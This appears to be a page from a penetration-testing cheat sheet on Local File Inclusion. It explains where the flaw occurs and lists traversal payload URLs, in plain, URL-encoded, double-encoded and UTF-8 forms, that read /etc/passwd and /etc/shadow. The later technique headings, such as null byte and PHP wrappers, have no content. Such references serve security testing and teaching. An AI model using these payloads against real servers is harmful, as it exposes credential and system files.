Local File Inclusion

Local File Inclusion (LFI)

Introduction

Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server

Where to find

  • Any endpoint that includes a file from a web server. For example, /index.php?page=index.html

How to exploit

  1. Basic payload

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../../../../../../../../../../etc/shadow

  1. URL encoding

http://example.com/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

  1. Double encoding

http://example.com/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd

  1. UTF-8 encoding

http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

  1. Using Null Byte (%00)

  1. From an existent folder

  1. Path truncation

  1. Using PHP Wrappers: filter

  1. Using PHP Wrappers: zlib

  1. Using PHP Wrappers: zip

  1. Using PHP Wrappers: data

  1. Using PHP Wrappers: expect

  1. Using PHP Wrappers: input

  1. Some unique bypass

References

PreviousInsecure Direct Object Reference (IDOR)NextMass Assignment Attack

Last updated